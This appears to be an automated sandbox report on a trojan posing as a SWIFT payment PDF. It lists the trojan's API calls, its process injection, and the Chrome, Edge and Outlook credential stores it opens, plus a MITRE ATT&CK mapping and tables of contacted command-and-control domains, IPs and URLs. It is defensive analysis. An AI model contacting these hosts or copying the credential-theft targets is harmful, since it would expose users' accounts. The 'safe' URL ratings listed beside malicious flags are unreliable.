Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00434418

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 0_2_0043333C mouse_event,mouse_event,

0_2_0043333C

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe"	Jump to behavior
Source: C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe	Process created: C:\Windows\SysWOW64\DevicePairingWizard.exe "C:\Windows\SysWOW64\DevicePairingWizard.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00446124

Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, nmlZZxePqIALDF.exe, 0000000B.00000002.5958126626.0000000001460000.00000002.00000001.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000B.00000000.1368878303.0000000001460000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: nmlZZxePqIALDF.exe, 0000000B.00000002.5958126626.0000000001460000.00000002.00000001.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000B.00000000.1368878303.0000000001460000.00000002.00000001.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000000.1512536199.0000000001BB1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: nmlZZxePqIALDF.exe, 0000000B.00000002.5958126626.0000000001460000.00000002.00000001.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000B.00000000.1368878303.0000000001460000.00000002.00000001.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000000.1512536199.0000000001BB1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: nmlZZxePqIALDF.exe, 0000000B.00000002.5958126626.0000000001460000.00000002.00000001.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000B.00000000.1368878303.0000000001460000.00000002.00000001.00040000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000000.1512536199.0000000001BB1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: WProgram Manager(

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 0_2_004720DB GetLocalTime,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,

0_2_004720DB

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 0_2_00472C3F GetUserNameW,

0_2_00472C3F

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 0_2_0041E364 GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

0_2_0041E364

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,

0_2_0040E500

Stealing of Sensitive Information

Tries to harvest and steal browser information (history, passwords, etc)

Source: Yara match	File source: 2.2.svchost.exe.520000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.5958070475.00000000014A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1441626408.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1442932990.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.5054439385.0000000004310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.5054354866.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1443008474.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.5958733126.0000000002A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\DevicePairingWizard.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\DevicePairingWizard.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Binary or memory string: WIN_XP
Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Binary or memory string: WIN_XPe
Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Binary or memory string: WIN_VISTA
Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Binary or memory string: WIN_7
Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Binary or memory string: WIN_8

Remote Access Functionality

Source: Yara match	File source: 2.2.svchost.exe.520000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.5958070475.00000000014A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1441626408.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1442932990.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.5054439385.0000000004310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.5054354866.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1443008474.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.5958733126.0000000002A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	0_2_004652BE
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00476619
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_0046CEF3 OleInitialize,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,	0_2_0046CEF3

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	5 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	5 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	16 System Information Discovery	Distributed Component Object Model	21 Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	141 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	100%	Avira	HEUR/AGEN.1321703
Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	35%	ReversingLabs	Win32.Trojan.Autoitinject
Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.rimberiokitchen.online/Bathroom_Design_Ideas.cfm?fp=X2STJX2iN0rw6IGJ4h%2B4RPbPlzKdu8upcAI	0%	Avira URL Cloud	safe
http://www.vnxoso88.art/x1pj/?mRu=rrUVFAplNZMcakJZOJE4CcqToYvowPkUAgJ/Lg0h4NOzPxri4UWPxE+iyT5MFYFQlY7+f2AMywjhKYvv2dkZ2pTnN7HLjvrDE8g/sgQAyuCfG8ldMNFJeds=&UJ=7H1XM	0%	Avira URL Cloud	safe
http://www.wukong.college/4wc1/	0%	Avira URL Cloud	safe
http://www.webworld.digital/zis1/?mRu=9Akn8HQ/w9IGHY5hfK3Sz2XWYTq6JbeGUZoZjuxeZl7qmmC+7O6Wru/gQUs9lGhVdHn4ksWgMiMPd3qmb+i3xZVXvSH4PNUsYgsF4Q6R4VB3b48Gv0g7yoc=&UJ=7H1XM	0%	Avira URL Cloud	safe
http://www.jigg.space/wie9/?mRu=lL7P/0JUYVbqWckkUFA5AZs0yLHF2CZptxiRtFaWww2Jt1+4Ybj8qDPeqsoco5xM//SPE5hjfF332jPzZ07z97WSr/ctCPXD3Kda+wiI2ZiEZuGqb25QMsE=&UJ=7H1XM	0%	Avira URL Cloud	safe
http://www.pg874.shop/h7d8/?mRu=6+VCk9pNPTQZYCZ6d4PN3EmbuLb87q5olpsVnOemsYlmrkAHkUX/D7H9eR5xtWpIZUSGBjAAXrZ9ZbWt4k2m/mELc90NwjhxnhDwTkUjNTY6s8tAYo2upp8=&UJ=7H1XM	0%	Avira URL Cloud	safe
http://www.rimberiokitchen.online/Bathroom_Remodeling_Tips.cfm?fp=X2STJX2iN0rw6IGJ4h%2B4RPbPlzKdu8up	0%	Avira URL Cloud	safe
https://dts.gnpge.com	0%	Avira URL Cloud	safe
http://www.moneys.fit/z4qw/?mRu=lw0Z9E/N2I/dpWlk8pTLJHRCZkuY3j9SfKchD5ao+gJdMbWwfo1urvInPerR2ecaSF54xdut+09OjjfToxgsYGp4jUJZlMustb83Phs9Oq/TesXOyzSulKc=&UJ=7H1XM	0%	Avira URL Cloud	safe
http://www.dreampay.shop/a18n/	0%	Avira URL Cloud	safe
http://www.makerpay.xyz/lp9q/	0%	Avira URL Cloud	safe
http://www.pg874.shop/h7d8/	0%	Avira URL Cloud	safe
http://www.smartbuyoffer.online/fid8/	0%	Avira URL Cloud	safe
http://www.rimberiokitchen.online/Kitchen_Remodeling.cfm?fp=X2STJX2iN0rw6IGJ4h%2B4RPbPlzKdu8upcAIRhX	0%	Avira URL Cloud	safe
http://www.rimberiokitchen.online/__media__/design/underconstructionnotice.php?d=rimberiokitchen.onl	0%	Avira URL Cloud	safe
http://www.moneys.fit/z4qw/	0%	Avira URL Cloud	safe
http://www.dreampay.shop/a18n/?mRu=GNYnn+/HdyV8duRMqtcyXm0xy6A5R7OP0g3qQsxli+rcIWT14zRUDqgxNRAzolcecH8yu9AKKAak4SdSyZ6RvIdAVt2QUT1IwNlPBAoCd8CxXhf8uuYrVNc=&UJ=7H1XM	0%	Avira URL Cloud	safe
http://www.jiujiuxi.love/yiph/?mRu=LkalMmDuboj4872empR9rFcNrijVZ/XXOKlfHTPEe/ophG0OElyabBCkCoxIRZ4fKVtkhMIDAwIoplbOZBCU2IJMHRXqXMq09ankZnsM2pers/hD+qKFjlc=&UJ=7H1XM	0%	Avira URL Cloud	safe
http://www.wukong.college/4wc1/?mRu=2onXjOgtXs7bFrsmBuZreqMXUphshRxX5MKbqzS42irGFJYns6q4JN3vt1eB5PqznJS/LdYYFyeg3ON9AeFtKxD4o+R2FH9zSHG9zjVrST6RS49i0a4KyRw=&UJ=7H1XM	0%	Avira URL Cloud	safe
http://www.jiujiuxi.love/yiph/	0%	Avira URL Cloud	safe
http://www.rimberiokitchen.online/xvf3/?mRu=WlBP6ZDj33sme071J7YmRt2meznD9lOMeO4smNCsOshEYDb+rkIOBjcGODqfewmlgMUUULEtW3alEv1cIqlE3oXaOj92B6nyIwOIgW4/F45i+leDgRmHhUA=&UJ=7H1XM	0%	Avira URL Cloud	safe
http://www.zz83x.top/mk81/?mRu=gzc9tI9/iKFBs/CfQiHfQ1hmFq4huhxeMTnwpTnTnn57GmdDkYbUUImaMzeYKxMl89CL7o6kx1g4xig0s43SWJ3EiMJuN9y4NOM7gvWFzz5YCjlwg0gKJrc=&UJ=7H1XM	0%	Avira URL Cloud	safe
http://www.vnxoso88.art/x1pj/	0%	Avira URL Cloud	safe
http://www.qiusuo.vip/6yjb/	0%	Avira URL Cloud	safe
http://www.futurevision.life/cadc/	0%	Avira URL Cloud	safe
http://www.ebook.farm/rzaq/?mRu=S7FCB2U3I5+MEOix97haLm8n4ZiU5s+sYyIa9Io4LXSLJStcMtKrD203LPev0YXMiZ/cleh4jZ/UsKrDR5eop/VU9oI7TN7VO3RaOL7GPdXsiE9kkN1XODc=&UJ=7H1XM	0%	Avira URL Cloud	safe
http://www.econsultoria.online	0%	Avira URL Cloud	safe
http://www.rimberiokitchen.online/sk-logabpstatus.php?a=L1N3WXcvTG4rbTFUeWgzcExCUXZVOTUzaFVabnBmQkpi	0%	Avira URL Cloud	safe
http://www.webworld.digital/zis1/	0%	Avira URL Cloud	safe
http://www.jigg.space/wie9/	0%	Avira URL Cloud	safe
http://www.econsultoria.online/cbd3/?mRu=HW/lerOyVqCXu7n0t/EUlYJ02y1yNdHzoGstxvzncQbYfsbQeR2dtxxMvMPrm1eSchBLBkAlfh8ey4GsUHcWZCjdVQ1E0is8tfiw+yJHiCAhhuX0KyTHXeE=&UJ=7H1XM	0%	Avira URL Cloud	safe
http://www.rimberiokitchen.online/px.js?ch=1	0%	Avira URL Cloud	safe
https://www.hostgator.com.br	0%	Avira URL Cloud	safe
http://www.ebook.farm/rzaq/	0%	Avira URL Cloud	safe
http://www.rimberiokitchen.online/sk-logabpstatus.php?a=TEdQajRwbU5mNWR3d0VHeGk1WjViUVdIYjZ3dUM5K0NC	0%	Avira URL Cloud	safe
http://www.rimberiokitchen.online/px.js?ch=2	0%	Avira URL Cloud	safe
http://www.makerpay.xyz/lp9q/?mRu=Tgs0l5rQdINE0HmohrfgPmtVT9TM6mRmz28qlq5N+W6TIOOkclTpEHygPFllR64ZyPP4U6P7xjaKPMS0ZS1/tTAw9ro2DSZN0V3b+mDHt47uSUTeFI2WDZw=&UJ=7H1XM	0%	Avira URL Cloud	safe
http://www.qiusuo.vip/6yjb/?mRu=VYNzRxyQK7JD7ZohbYVagv51ruE2l0awbhfoJPQ4rqLtN/pKU1ruR3BE6r+8vb9gac3NpWXxvYS6rs+3SUr3GMlMxkDr3AnCXH8/Zbk4o49navQqKFljaLg=&UJ=7H1XM	0%	Avira URL Cloud	safe
http://www.futurevision.life/cadc/?mRu=yfxAwDfWka0dfjkEErxT6WYgWaOc4HN689PIo8avXNW9JAsEk9V7nvZjppH3ozqb+GZGdofwBlLzR01W2aLtY3/CfTpxh0qnHwCWqwdq33lIMBmS8NPwCm4=&UJ=7H1XM	0%	Avira URL Cloud	safe
http://www.rimberiokitchen.online/xvf3/	0%	Avira URL Cloud	safe
http://www.econsultoria.online/cbd3/	0%	Avira URL Cloud	safe
http://www.rimberiokitchen.online/Kitchen_Products.cfm?fp=X2STJX2iN0rw6IGJ4h%2B4RPbPlzKdu8upcAIRhXuJ	0%	Avira URL Cloud	safe
http://www.rimberiokitchen.online/__media__/js/trademark.php?d=rimberiokitchen.online&type=ns	0%	Avira URL Cloud	safe
http://www.rimberiokitchen.online/Bathroom_Cabinets.cfm?fp=X2STJX2iN0rw6IGJ4h%2B4RPbPlzKdu8upcAIRhXu	0%	Avira URL Cloud	safe
http://www.smartbuyoffer.online/fid8/?mRu=TlJ1g/LEHcod8cWOxAq9FP73H09YVH7WgnCIHnyD26ULKZOEEsjMueNmMu+sImVaRLKPh0l5mf17vNoqkS6RVPulxmIy09RerMB73PEzvxMXDGvmWRP6LAE=&UJ=7H1XM	0%	Avira URL Cloud	safe
http://www.Rimberiokitchen.online	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.rimberiokitchen.online	208.91.197.27	true	true	unknown
zz83x.top	206.119.81.121	true	true	unknown
www.jigg.space	173.255.194.134	true	true	unknown
smartbuyoffer.online	108.179.252.152	true	true	unknown
econsultoria.online	3.33.130.190	true	true	unknown
www.qiusuo.vip	154.38.64.6	true	true	unknown
www.jiujiuxi.love	199.59.243.227	true	true	unknown
www.ebook.farm	199.59.243.227	true	true	unknown
www.wukong.college	47.52.221.8	true	true	unknown
www.makerpay.xyz	13.248.169.48	true	true	unknown
77980.bodis.com	199.59.243.227	true	false	high
www.dreampay.shop	13.248.169.48	true	true	unknown
pg874.shop	84.32.84.32	true	true	unknown
webworld.digital	84.32.84.32	true	true	unknown
moneys.fit	3.33.130.190	true	true	unknown
www.futurevision.life	203.161.49.193	true	true	unknown
www.webworld.digital	unknown	unknown	false	unknown
www.smartbuyoffer.online	unknown	unknown	false	unknown
www.vnxoso88.art	unknown	unknown	false	unknown
www.zz83x.top	unknown	unknown	false	unknown
www.pg874.shop	unknown	unknown	false	unknown
www.econsultoria.online	unknown	unknown	false	unknown
www.moneys.fit	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.vnxoso88.art/x1pj/?mRu=rrUVFAplNZMcakJZOJE4CcqToYvowPkUAgJ/Lg0h4NOzPxri4UWPxE+iyT5MFYFQlY7+f2AMywjhKYvv2dkZ2pTnN7HLjvrDE8g/sgQAyuCfG8ldMNFJeds=&UJ=7H1XM	true	Avira URL Cloud: safe	unknown
http://www.dreampay.shop/a18n/	true	Avira URL Cloud: safe	unknown
http://www.moneys.fit/z4qw/?mRu=lw0Z9E/N2I/dpWlk8pTLJHRCZkuY3j9SfKchD5ao+gJdMbWwfo1urvInPerR2ecaSF54xdut+09OjjfToxgsYGp4jUJZlMustb83Phs9Oq/TesXOyzSulKc=&UJ=7H1XM	true	Avira URL Cloud: safe	unknown
http://www.pg874.shop/h7d8/?mRu=6+VCk9pNPTQZYCZ6d4PN3EmbuLb87q5olpsVnOemsYlmrkAHkUX/D7H9eR5xtWpIZUSGBjAAXrZ9ZbWt4k2m/mELc90NwjhxnhDwTkUjNTY6s8tAYo2upp8=&UJ=7H1XM	true	Avira URL Cloud: safe	unknown
http://www.wukong.college/4wc1/	true	Avira URL Cloud: safe	unknown
http://www.jigg.space/wie9/?mRu=lL7P/0JUYVbqWckkUFA5AZs0yLHF2CZptxiRtFaWww2Jt1+4Ybj8qDPeqsoco5xM//SPE5hjfF332jPzZ07z97WSr/ctCPXD3Kda+wiI2ZiEZuGqb25QMsE=&UJ=7H1XM	true	Avira URL Cloud: safe	unknown
http://www.webworld.digital/zis1/?mRu=9Akn8HQ/w9IGHY5hfK3Sz2XWYTq6JbeGUZoZjuxeZl7qmmC+7O6Wru/gQUs9lGhVdHn4ksWgMiMPd3qmb+i3xZVXvSH4PNUsYgsF4Q6R4VB3b48Gv0g7yoc=&UJ=7H1XM	true	Avira URL Cloud: safe	unknown
http://www.smartbuyoffer.online/fid8/	true	Avira URL Cloud: safe	unknown
http://www.dreampay.shop/a18n/?mRu=GNYnn+/HdyV8duRMqtcyXm0xy6A5R7OP0g3qQsxli+rcIWT14zRUDqgxNRAzolcecH8yu9AKKAak4SdSyZ6RvIdAVt2QUT1IwNlPBAoCd8CxXhf8uuYrVNc=&UJ=7H1XM	true	Avira URL Cloud: safe	unknown
http://www.wukong.college/4wc1/?mRu=2onXjOgtXs7bFrsmBuZreqMXUphshRxX5MKbqzS42irGFJYns6q4JN3vt1eB5PqznJS/LdYYFyeg3ON9AeFtKxD4o+R2FH9zSHG9zjVrST6RS49i0a4KyRw=&UJ=7H1XM	true	Avira URL Cloud: safe	unknown
http://www.moneys.fit/z4qw/	true	Avira URL Cloud: safe	unknown
http://www.makerpay.xyz/lp9q/	true	Avira URL Cloud: safe	unknown
http://www.jiujiuxi.love/yiph/?mRu=LkalMmDuboj4872empR9rFcNrijVZ/XXOKlfHTPEe/ophG0OElyabBCkCoxIRZ4fKVtkhMIDAwIoplbOZBCU2IJMHRXqXMq09ankZnsM2pers/hD+qKFjlc=&UJ=7H1XM	true	Avira URL Cloud: safe	unknown
http://www.pg874.shop/h7d8/	true	Avira URL Cloud: safe	unknown
http://www.jiujiuxi.love/yiph/	true	Avira URL Cloud: safe	unknown
http://www.rimberiokitchen.online/xvf3/?mRu=WlBP6ZDj33sme071J7YmRt2meznD9lOMeO4smNCsOshEYDb+rkIOBjcGODqfewmlgMUUULEtW3alEv1cIqlE3oXaOj92B6nyIwOIgW4/F45i+leDgRmHhUA=&UJ=7H1XM	true	Avira URL Cloud: safe	unknown
http://www.zz83x.top/mk81/?mRu=gzc9tI9/iKFBs/CfQiHfQ1hmFq4huhxeMTnwpTnTnn57GmdDkYbUUImaMzeYKxMl89CL7o6kx1g4xig0s43SWJ3EiMJuN9y4NOM7gvWFzz5YCjlwg0gKJrc=&UJ=7H1XM	true	Avira URL Cloud: safe	unknown
http://www.ebook.farm/rzaq/?mRu=S7FCB2U3I5+MEOix97haLm8n4ZiU5s+sYyIa9Io4LXSLJStcMtKrD203LPev0YXMiZ/cleh4jZ/UsKrDR5eop/VU9oI7TN7VO3RaOL7GPdXsiE9kkN1XODc=&UJ=7H1XM	true	Avira URL Cloud: safe	unknown
http://www.vnxoso88.art/x1pj/	true	Avira URL Cloud: safe	unknown
http://www.futurevision.life/cadc/	true	Avira URL Cloud: safe	unknown
http://www.qiusuo.vip/6yjb/	true	Avira URL Cloud: safe	unknown
http://www.webworld.digital/zis1/	true	Avira URL Cloud: safe	unknown
http://www.jigg.space/wie9/	true	Avira URL Cloud: safe	unknown
http://www.econsultoria.online/cbd3/?mRu=HW/lerOyVqCXu7n0t/EUlYJ02y1yNdHzoGstxvzncQbYfsbQeR2dtxxMvMPrm1eSchBLBkAlfh8ey4GsUHcWZCjdVQ1E0is8tfiw+yJHiCAhhuX0KyTHXeE=&UJ=7H1XM	true	Avira URL Cloud: safe	unknown
